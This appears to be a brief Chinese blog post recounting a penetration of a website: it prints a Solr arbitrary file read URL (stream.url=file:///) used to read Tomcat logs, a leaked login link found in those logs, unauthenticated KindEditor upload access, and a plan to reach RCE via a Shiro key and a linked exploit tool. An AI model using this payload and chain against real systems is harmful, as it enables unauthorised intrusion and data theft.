渗透经历

发布于 2021-06-18  637 次阅读


solr任意文件读取

任意文件读取,先看日志

https://xxx.com/solr/code1/debug/dump?param=ContentStreams&stream.url=file:///data/tomcat/logs/localhost_access_log.2021-05-16.txt

翻到登陆页面

https://xxx.com/login/login?id=8600040536&id_type=WD&branchCode=12A02&nowDate=1621124293&userCode=caicaikan&key=bugaosuni&keyword=bugaosuni

进入后台

到处翻了翻

找了下发现是使用的kindeditor

测了下发现无需登陆也能访问

到这里又想了想直接进solr里翻呢

这个看起来就是个上传好吧。上传小能手?搜了下相关漏洞

前端访问页面

貌似直接找到shiro密钥不就行了,版本如下

然后脚本小子RCE就行了

https://github.com/Ares-X/shiro-exploit

图片貌似有点糊,看文档吧


game to game, not win